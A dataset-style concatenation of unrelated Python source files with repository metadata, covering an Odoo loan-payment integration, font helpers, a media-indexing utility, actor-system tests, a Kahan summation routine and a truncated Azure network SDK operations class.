| no_license | levislibra/financiera_pagos_360 | 5e8f6f2fe43311ea3b918daff359ec126ecadc0b | 4881773281e970ff23c3c9e913ee0a5260e91502 | refs/heads/master | 2023-07-06T01:09:20.089773 | 2023-06-21T14:57:10 | 2023-06-21T14:57:10 | 205,934,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,869 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from datetime import datetime, timedelta, date
PAGOS360_MONTO_MINIMO = 10
class ExtendsFinancieraPrestamoCuota(models.Model):
_inherit = 'financiera.prestamo.cuota'
_name = 'financiera.prestamo.cuota'
pagos_360_generar_pago_voluntario = fields.Boolean('Pagos360 - Generar cupon de pago voluntario')
pagos_360_solicitud_id = fields.Integer('Pagos360 - ID de la solicitud')
pagos_360_solicitud_previa1_id = fields.Integer('Pagos360 - ID de la solicitud previa 1')
pagos_360_solicitud_previa1_fecha = fields.Date('Pagos360 - Fecha de la solicitud previa 1')
pagos_360_solicitud_previa2_id = fields.Integer('Pagos360 - ID de la solicitud previa 2')
pagos_360_solicitud_previa2_fecha = fields.Date('Pagos360 - Fecha de la solicitud previa 2')
pagos_360_solicitud_id_origen_pago = fields.Integer('Pagos360 - ID de la solicitud de pago', readonly=1)
pagos_360_solicitud_state = fields.Selection([
('pending', 'Pendiente'), ('paid', 'Pagada'),
('expired', 'Expirada'), ('reverted', 'Revertida')],
string='Pagos360 - Estado', readonly=True, default='pending')
pagos_360_first_due_date = fields.Date('Pagos360 - Primer Vencimiento')
pagos_360_first_total = fields.Float('Pagos360 - Importe', digits=(16,2))
pagos_360_second_due_date = fields.Date('Pagos360 - Segundo Vencimiento')
pagos_360_second_total = fields.Float('Pagos360 - Importe', digits=(16,2))
pagos_360_barcode = fields.Char('Pagos360 - Barcode')
pagos_360_checkout_url = fields.Char('Pagos360 - Url de pago online')
pagos_360_barcode_url = fields.Char('Pagos360 - Url imagen del codigo de barras')
pagos_360_pdf_url = fields.Char('Pagos360 - Url de cupon de pago en pdf')
# Nueva integracion
solicitud_ids = fields.One2many('financiera.pagos360.solicitud', 'cuota_id', 'Solicitudes de Pago')
@api.one
def pagos_360_crear_solicitud(self):
if self.state in ('activa', 'judicial', 'incobrable') and self.saldo >= PAGOS360_MONTO_MINIMO:
solicitud_id = self.env['financiera.pagos360.solicitud'].crear_solicitud(self)
solicitud_id.generar_solicitud()
@api.one
def pagos_360_cobrar_y_facturar(self, payment_date, journal_id, factura_electronica, amount, invoice_date, punitorio_stop_date, solicitud_id=None):
print("pagos_360_cobrar_y_facturar")
partner_id = self.partner_id
fpcmc_values = {
'partner_id': partner_id.id,
'company_id': self.company_id.id,
}
multi_cobro_id = self.env['financiera.prestamo.cuota.multi.cobro'].create(fpcmc_values)
partner_id.multi_cobro_ids = [multi_cobro_id.id]
# Fijar fecha punitorio
self.punitorio_fecha_actual = punitorio_stop_date
print("Punitorio stop date: ", str(punitorio_stop_date))
if self.saldo > 0:
self.confirmar_cobrar_cuota(payment_date, journal_id, amount, multi_cobro_id)
if len(multi_cobro_id.payment_ids) > 0:
if solicitud_id:
solicitud_id.pagos_360_payment_id = multi_cobro_id.payment_ids[0]
# Facturacion cuota
if not self.facturada:
fpcmf_values = {
'invoice_type': 'interes',
'company_id': self.company_id.id,
}
multi_factura_id = self.env['financiera.prestamo.cuota.multi.factura'].create(fpcmf_values)
self.facturar_cuota(invoice_date, factura_electronica, multi_factura_id, multi_cobro_id)
if multi_factura_id.invoice_amount == 0:
multi_factura_id.unlink()
multi_factura_punitorio_id = None
if self.punitorio_a_facturar > 0:
fpcmf_values = {
'invoice_type': 'punitorio',
'company_id': self.company_id.id,
}
multi_factura_punitorio_id = self.env['financiera.prestamo.cuota.multi.factura'].create(fpcmf_values)
self.facturar_punitorio_cuota(invoice_date, factura_electronica, multi_factura_punitorio_id, multi_cobro_id)
if multi_factura_punitorio_id != None and multi_factura_punitorio_id.invoice_amount == 0:
multi_factura_punitorio_id.unlink()
| [
"[email protected]"
]
| |
bb73a8d6d66d5da10e7f44de054504874ad8a460 | 08f484c61bf303ee2ec78aff9960f4812fe1e839 | /coldtype/helpers.py | 5449040cdd452d951ffbae72f5c94dca7a01bca1 | [
"Apache-2.0"
]
| permissive | rohernandezz/coldtype | 02bee08e021be8dfe45328076c512f06ea8f13ae | 724234fce454699a469d17b6c78ae50fa8138169 | refs/heads/main | 2023-07-27T16:09:10.696755 | 2021-09-11T21:17:55 | 2021-09-11T21:17:55 | 405,537,609 | 0 | 0 | Apache-2.0 | 2021-09-12T03:34:29 | 2021-09-12T03:34:28 | null | UTF-8 | Python | false | false | 2,541 | py | from pathlib import Path
from defcon import Font as DefconFont
from coldtype.text.reader import normalize_font_path, StyledString
from coldtype.pens.datpen import DATPens
from coldtype.interpolation import norm, interp_dict, lerp, loopidx
from random import Random
def sibling(root, file):
return Path(root).parent.joinpath(file)
def raw_ufo(path):
return DefconFont(normalize_font_path(path))
def ßhide(el):
return None
def ßshow(el):
return el
def cycle_idx(arr, idx):
if idx < 0:
return len(arr) - 1
elif idx >= len(arr):
return 0
else:
return idx
def random_series(start=0, end=1, seed=0, count=5000):
rnd = Random()
rnd.seed(seed)
rnds = []
for x in range(count):
rnds.append(start+rnd.random()*(end-start))
return rnds
def show_points(pen, style, offcurves=True, filter=lambda i: True):
pt_labels = DATPens()
if offcurves:
def labeller(idx, x, y):
if filter(idx):
pt_labels.append(StyledString(str(idx), style).pen().translate(x, y))
pen.map_points(labeller)
else:
for idx, (m, pts) in enumerate(pen.value):
if len(pts) > 0 and filter(idx):
pt_labels += StyledString(str(idx), style).pen().translate(*pts[-1])
return pt_labels
_by_uni = None
_by_glyph = None
_class_lookup = None
def _populate_glyphs_unis():
global _by_uni
global _by_glyph
global _class_lookup
_by_uni = {}
_by_glyph = {}
_class_lookup = {}
#try:
if True:
lines = (Path(__file__).parent.parent / "assets/glyphNamesToUnicode.txt").read_text().split("\n")
for l in lines:
if l.startswith("#"):
continue
l = l.split(" ")[:3]
uni = int(l[1], 16)
_by_uni[uni] = l[0]
_by_glyph[l[0]] = uni
_class_lookup[l[0]] = l[2]
#except:
# pass
def uni_to_glyph(u):
if not _by_uni:
_populate_glyphs_unis()
return _by_uni.get(u)
def glyph_to_uni(g):
if g.lower() in [
"gcommaaccent",
"kcommaaccent",
"lcommaaccent",
"ncommaaccent",
"rcommaaccent",
]:
g = g.replace("commaaccent", "cedilla")
elif g.lower() == "kgreenlandic":
g = g.replace("greenlandic", "ra")
if not _by_glyph:
_populate_glyphs_unis()
return _by_glyph.get(g)
def glyph_to_class(g):
if not _class_lookup:
_populate_glyphs_unis()
return _class_lookup.get(g) | [
"[email protected]"
]
| |
5bdb03989f229d884781faa92039d3ae802ef1cd | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2276/60580/316515.py | 8b6451c802044f3f3c441502c4705c5b7a3a4460 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 643 | py | def manage(R, C, r0, c0):
ans = [[r0, c0]]
if R * C == 1:
return ans
else:
for k in range(1, 2 * (R + C), 2):
for dr, dc, dk in ((0, 1, k), (1, 0, k), (0, -1, k + 1), (-1, 0, k + 1)):
for _ in range(dk):
r0 = r0 + dr
c0 = c0 + dc
if 0 <= r0 < R and 0 <= c0 < C:
ans.append([r0, c0])
if len(ans) == R * C:
return ans
return ans
R = int(input())
C = int(input())
r0 = int(input())
c0 = int(input())
result = manage(R, C, r0, c0)
print(result)
| [
"[email protected]"
]
| |
6cd50fc250fd30608492a7d43a5d379ded730f9b | ae1e5b78fcbb88225b414fbdaecaa3783ae37fd8 | /guillotina_glex/utility.py | 2587ed35b06a46f6a203c894d716ceb9f9a15e9e | []
| no_license | vangheem/guillotina_glex | d65d7cfce8702a3b31ca5516f001f9bb89b43707 | ef22a7c42191d6a8492e6aceb81273a326eaa6aa | refs/heads/master | 2021-01-06T20:35:35.059172 | 2017-09-05T00:33:22 | 2017-09-05T00:33:22 | 99,527,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import asyncio
import base64
import json
import logging
import os
import aiohttp
from guillotina import app_settings, configure
from guillotina.async import IAsyncUtility
from guillotina.component import getUtility
from guillotina_gcloudstorage.interfaces import IGCloudBlobStore
from guillotina_gcloudstorage.storage import OBJECT_BASE_URL
from .db import DB
logger = logging.getLogger(__name__)
_ignored_titles = (
'workout',
'pilates',
'all about',
'songs',
'insanity',
'lesson',
'disc'
)
OMDB_URL = 'http://www.omdbapi.com/'
class IGlexUtility(IAsyncUtility):
pass
@configure.utility(provides=IGlexUtility)
class GlexUtility:
def __init__(self, settings={}, loop=None):
self._settings = settings
self._loop = loop
async def initialize(self, app=None):
self._queue = asyncio.Queue()
self._db = DB()
for prefix in app_settings["bucket_folders"]:
await self.load_videos(prefix)
while True:
try:
video = await self._queue.get()
await self.get_video_data(video)
except Exception:
logger.warn(
'error getting video data',
exc_info=True)
await asyncio.sleep(1)
finally:
self._queue.task_done()
async def get_video_data(self, video):
filename = video['name'].split('/')[-1]
video['filename'] = filename
name = '.'.join(filename.split('.')[:-1]).replace('.', '')
if not os.path.exists(app_settings['download_folder']):
os.mkdir(app_settings['download_folder'])
storage_filename = '{}-info'.format(
base64.b64encode(video['id'].encode('utf8')).decode('utf8'))
filepath = os.path.join(app_settings['download_folder'],
storage_filename)
if os.path.exists(filepath):
with open(filepath) as fi:
video['data'] = json.loads(fi.read())
logger.warn(f'found cached data for movie for {filename}')
return
for ignored in _ignored_titles:
if ignored in name.lower():
return
tries = [
name,
name.replace('_', ' ')
]
for removed in ('-', ':', '('):
if removed in name:
tries.append(name.split(removed)[0].strip())
for movie_name in tries:
logger.warn(f'searching for movie name {movie_name}')
async with aiohttp.ClientSession() as session:
resp = await session.get(OMDB_URL, params={
't': movie_name,
'apikey': app_settings['omdb_api_key']
})
if resp.status == 200:
data = await resp.json()
if data['Response'] == 'True':
video['data'] = data
with open(filepath, 'w') as fi:
fi.write(json.dumps(data))
return
else:
data = await resp.text()
logger.warn(f'error getting video data for {name}, '
f'status: {resp.status}, text: {data}')
return
# nothing found, write to that effect...
with open(filepath, 'w') as fi:
fi.write(json.dumps({'Response': 'False'}))
async def finalize(self, app=None):
pass
async def get_db(self):
return await self._db.get()
async def load_videos(self, prefix='Movies/'):
db = await self._db.get()
if 'videos' not in db:
db['videos'] = {}
util = getUtility(IGCloudBlobStore)
async with aiohttp.ClientSession() as session:
access_token = await util.get_access_token()
url = '{}/vangheem-media/o'.format(OBJECT_BASE_URL)
resp = await session.get(url, headers={
'AUTHORIZATION': 'Bearer %s' % access_token
}, params={
'prefix': prefix
})
data = await resp.json()
for video in data['items']:
filename = video['name']
if filename == prefix:
continue
ext = filename.split('.')[-1].lower()
if ext not in ('m4v', 'mov', 'mp4'):
continue
video = {
'name': filename,
'id': video['id'],
'created': video['timeCreated'],
'updated': video['updated'],
'link': video['mediaLink'],
'size': video['size'],
'selfLink': video['selfLink']
}
db['videos'][video['id']] = video
await self._queue.put(video)
await self._db.save()
| [
"[email protected]"
]
| |
b6f5cd268a316233e9b02e99e538aac933b2d87b | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /2-Research_Defense/sample_distribution.py | b70dd6d4e01d8989ed15ce6a6384553f4a8bc803 | []
| no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 2,247 | py | import numpy as np
from fits import cdf_points, flat_fit, linear_fit, cubic_fit, quintic_fit
from util.plot import Plot
from random import seed, sample
values = list(np.percentile(np.random.normal(size=(100000,)),
np.linspace(0,100,1000)))
truth = linear_fit(values)
true_min_max = (min(values), max(values))
# Create a visual of some sample distribution approximations.
def make_plot(functions, prename):
# Initialize some settings.
seed(0); k = 10
pop = sample(values, k)
x, y = cdf_points(pop)
styles = [None, "dashdot", "dot", "dash"]
styles = [None] * 4
# Create the plot.
p = Plot("", "x","CDF", font_family="times", font_size=18)
p.add("Sample", x, y)
p.add_func("Truth", truth, true_min_max, color=p.color((0,0,0,.3)))
for f,s in zip(functions, styles):
name = f.__name__.replace("_"," ").title().split()[0].replace("Flat","EDF")
# Set the legend properties.
if "quintic" in name.lower():
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8, fill='toprevy')
else:
p.add_func(name, f(pop), true_min_max, dash=s, opacity=.8)
legend = dict(
xanchor = "center",
yanchor = "top",
x = .25,
y = .8,
orientation = "v",
bgcolor="white",
bordercolor="grey",
borderwidth=.5
)
# Create the plot.
# p.show(y_range=[-.1, 1.1], x_range=true_min_max, width=400*1.4,
# height=300*1.4) #, file_name=prename+"-sample-prediction.html")
# - remove the stuff from quintic fit
# - remove error bar plots
# Fit the errors
p = Plot("", "Absolute Error","CDF", font_family="times", font_size=18)
print("Computing errors..")
fit = f(pop)
errors = abs(np.linspace(0,1,len(values)) - np.array([fit(v) for v in values]))
print("Fitting error distribution..")
fit = linear_fit(errors)
print("Making plot..")
p.add_func("Error", fit, [min(errors),max(errors)])
p.show(width=400*1.4, height=300*1.4)
# Make the two different plots.
functions = [flat_fit, linear_fit, cubic_fit, quintic_fit]
make_plot(functions, "fl")
# functions = [cubic_fit, quintic_fit]
# make_plot(functions, "cq")
| [
"[email protected]"
]
| |
1e7d8c52911d6060dd4720aae9d114a1d173594a | 3049bc6a1d8ed3b1dfe7280a551bf14cd7df1d98 | /thespian/test/testSystemMessages.py | 02bc9eaa2c799e5e75d136ac1c33f6e3addaefec | [
"MIT"
]
| permissive | liuzhijun/Thespian | a9e159f21af1018fe45cce681390fba4fd28bdae | a536cbeace24ab84659160e2a438ebdd62a891e7 | refs/heads/master | 2021-01-15T12:41:27.137415 | 2016-04-08T01:33:27 | 2016-04-08T01:33:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,343 | py | import unittest
import logging
import time, datetime
import thespian.test.helpers
from thespian.actors import *
from thespian.test import ActorSystemTestCase
class EchoActor(Actor):
def receiveMessage(self, msg, sender):
logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
self.send(sender, msg)
class Kill_The_Messenger(Actor):
def receiveMessage(self, message, sender):
self.send(sender, ActorExitRequest())
class FakeSystemMessage(ActorSystemMessage):
pass
smallwait = datetime.timedelta(milliseconds=50)
class TestASimpleSystem(ActorSystemTestCase):
testbase='Simple'
scope='func'
def testCreateActorSystem(self):
pass
def testSimpleActor(self):
echo = ActorSystem().createActor(EchoActor)
def testSimpleMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, 'hello')
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testSystemMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, FakeSystemMessage())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testKillMessageTell(self):
echo = ActorSystem().createActor(EchoActor)
ActorSystem().tell(echo, ActorExitRequest())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testKillMessageTellKiller(self):
ktm = ActorSystem().createActor(Kill_The_Messenger)
ActorSystem().tell(ktm, 'hello')
ActorSystem().tell(ktm, ActorExitRequest())
time.sleep(0.02) # allow tell to work before ActorSystem shutdown
def testSimpleMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
self.assertEqual(ActorSystem().ask(echo, 'hello', smallwait), 'hello')
def testSystemMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
# SystemMessages are explicitly filtered from being returned
# via Ask() or Tell(), with the exception of PoisonMessage.
self.assertIsNone(ActorSystem().ask(echo, FakeSystemMessage(), smallwait))
def testKillMessageAsk(self):
echo = ActorSystem().createActor(EchoActor)
# SystemMessages are explicitly filtered from being returned
# via Ask() or Tell(), with the exception of PoisonMessage.
self.assertIsNone(ActorSystem().ask(echo, ActorExitRequest(), smallwait))
def testKillMessageAskKiller(self):
ktm = ActorSystem().createActor(Kill_The_Messenger)
self.assertIsNone(ActorSystem().ask(ktm, 'hello', smallwait))
self.assertIsNone(ActorSystem().ask(ktm, ActorExitRequest(), smallwait))
class TestMultiprocUDPSystem(TestASimpleSystem):
testbase='MultiprocUDP'
def setUp(self):
self.setSystemBase('multiprocUDPBase')
super(TestMultiprocUDPSystem, self).setUp()
class TestMultiprocTCPSystem(TestASimpleSystem):
testbase='MultiprocTCP'
def setUp(self):
self.setSystemBase('multiprocTCPBase')
super(TestMultiprocTCPSystem, self).setUp()
class TestMultiprocQueueSystem(TestASimpleSystem):
testbase='MultiprocQueue'
def setUp(self):
self.setSystemBase('multiprocQueueBase')
super(TestMultiprocQueueSystem, self).setUp()
| [
"[email protected]"
]
| |
743b5ae680bd84ca58609986ff88af66169e4909 | a512b8893b0d2de827d6292e810f3a98b41e132c | /Week8/Day3/Solutions/Python/prog5.py | bdf631feab069e18d120788bb85471ff2fb8701d | []
| no_license | Audarya07/Daily-Flash-Codes | d771079fd0d470e2d3e05679f17f32fb64b4f426 | cf96ca2b1676b038e243fac67be778381492ffeb | refs/heads/master | 2022-11-06T15:37:47.180729 | 2020-06-25T16:20:55 | 2020-06-25T16:20:55 | 274,960,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | print("Point A(x1,y1) = ",end=" ")
a = [int(x) for x in input().split()][:2]
print("Point B(x2,y2) = ",end=" ")
b = [int(x) for x in input().split()][:2]
print("Point c(x3,y3) = ",end=" ")
c = [int(x) for x in input().split()][:2]
distAB = ((b[0]-a[0])**2 + (b[1]-a[1])**2)**0.5
print("Distance AB = ",round(distAB,2))
distBC = ((c[0]-b[0])**2 + (c[1]-b[1])**2)**0.5
print("Distance BC = ",round(distBC,2))
distAC = ((c[0]-a[0])**2 + (c[1]-a[1])**2)**0.5
print("Distance AC = ",round(distAC,2))
| [
"[email protected]"
]
| |
e4a964c0162eae94bed9279674c41123d3a52262 | db217a42aa96688ce2d257820398fcc57bc1f810 | /gpscraper/admin.py | 81efffeec794a7cb5f214403c71d322afd2b92ba | []
| no_license | ans2human/Google-Play-Store-Scraper | 4a3012c5c22feb8dfd92cb9534f6ade400cb096f | ddf576d9c159c98429643e60fb5a642bbe848d49 | refs/heads/master | 2022-12-10T20:10:01.920280 | 2018-10-13T06:27:04 | 2018-10-13T06:27:04 | 149,260,886 | 1 | 1 | null | 2022-07-06T19:52:11 | 2018-09-18T09:16:37 | Python | UTF-8 | Python | false | false | 263 | py | from django.contrib import admin
from gpscraper.models import AppData, AppSearchIndex
class AppDataAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'dev_name', 'category')
admin.site.register(AppData, AppDataAdmin)
admin.site.register(AppSearchIndex)
| [
"[email protected]"
]
| |
3820e7373bc32531be8713da83fd7a55840bcfc7 | 270363be5ea94d33469fe4271eccb343357d4fa6 | /linalg/kahan/sum.py | 36c6ae09c06c5cab9877e5ad05b987dbbea1f78c | []
| no_license | tkelestemur/learn-linalg | c487389e9802b0223232bcb8c9ec0003cc7df091 | a6e04e903e5c9e00801b56a228c56fd8b8ba8c71 | refs/heads/master | 2023-03-19T05:53:34.407780 | 2021-01-02T13:54:40 | 2021-01-02T14:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | import numpy as np
class KahanSum:
"""Precise summation of finite-precision floating point numbers [1].
Reduces numerical error by storing a running compensation term that captures
lost low-order bits.
References:
[1]: https://en.wikipedia.org/wiki/Kahan_summation_algorithm
"""
def __init__(self):
"""Constructor."""
self.reset()
def reset(self):
"""Clears the internal state."""
# Create one variable for keeping track of the sum and one for storing the
# moving compensation term.
self._sum = 0
self._compensation = 0
def add(self, x):
"""Adds the float x to the summation term."""
x += self._compensation
sum = self._sum + x
self.compensation = x - (sum - self._sum)
self._sum = sum
def result(self):
return self._sum
def kahan_sum(x, axis=None, keepdims=False):
"""Kahan summation for 1 and 2D arrays.
Args:
x: A 1D or 2D array-like object.
axis: The axis which will be collapsed to perform the summation.
keepdims: A bool specifying whether to keep the collapsed axis.
Returns:
The kahan summation of x.
"""
# Ensure the array-like object is at most 2D.
x = np.asarray(x)
error_msg = "[!] Only 1D and 2D arrays are currently supported."
assert (x.ndim <= 2), error_msg
# Sanity check axis args.
error_msg = "[!] Axis value can only be None, 0 or 1."
assert (axis in [None, 0, 1]), error_msg
# Instantiate summation object.
summation = KahanSum()
# 1D case.
if x.ndim == 1:
for i in range(len(x)):
summation.add(x[i])
return summation.result()
# 2D case.
num_rows, num_cols = x.shape
if axis is None:
for i in range(num_rows):
for j in range(num_cols):
summation.add(x[i, j])
result = summation.result()
elif axis == 0:
# This list will hold num_cols sums.
sums = []
for i in range(num_cols):
summation.reset()
for j in range(num_rows):
summation.add(x[j, i])
sums.append(summation.result())
result = np.asarray(sums)
if keepdims:
result = result.reshape([1, num_cols])
else:
# This list will hold num_rows sums.
sums = []
for i in range(num_rows):
summation.reset()
for j in range(num_cols):
summation.add(x[i, j])
sums.append(summation.result())
result = np.asarray(sums)
if keepdims:
result = result.reshape([num_rows, 1])
return result
| [
"[email protected]"
]
| |
3538acda3d446425f03488c8e3f2348b3350b383 | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/treemap/_visible.py | 537d81152ae25e0c4789549c71e0a378ae159bba | [
"MIT"
]
| permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 470 | py | import _plotly_utils.basevalidators
class VisibleValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(self, plotly_name="visible", parent_name="treemap", **kwargs):
super(VisibleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
values=kwargs.pop("values", [True, False, "legendonly"]),
**kwargs
)
| [
"[email protected]"
]
| |
b14782c709a1527188e058d40485c6d3bf1ca83b | d3a0a2cabd572a9e597a399cf6b7012e34a99475 | /flask/script-api/flask/lib/python3.6/encodings/punycode.py | d9595a326e7e834b53f7441490b8b947d6828505 | []
| no_license | rahulgoyal911/Face-Recogniton-Using-OpenCV-and-Python-on-RaspberryPI | 06ed227dc56a0956d668de0d9f78287c75e790f4 | 1bbdfd45adebda0728831065df0580cd48dedef8 | refs/heads/master | 2020-05-01T01:18:18.868473 | 2019-03-24T16:48:21 | 2019-03-24T16:48:21 | 177,192,198 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | /home/rahulgoyal911/anaconda3/lib/python3.6/encodings/punycode.py | [
"[email protected]"
]
| |
770716b524c252a1d6bc14e545f41457cd23a5c4 | 531c47c15b97cbcb263ec86821d7f258c81c0aaf | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/operations/_application_security_groups_operations.py | db3954fd59626929afe5810e4fb75799bdf02e6f | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
]
| permissive | YijunXieMS/azure-sdk-for-python | be364d3b88204fd3c7d223df23756386ff7a3361 | f779de8e53dbec033f98f976284e6d9491fd60b3 | refs/heads/master | 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 | MIT | 2020-06-16T16:38:15 | 2019-08-30T21:08:55 | Python | UTF-8 | Python | false | false | 28,881 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplicationSecurityGroupsOperations(object):
"""ApplicationSecurityGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
"""Gets information about the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationSecurityGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
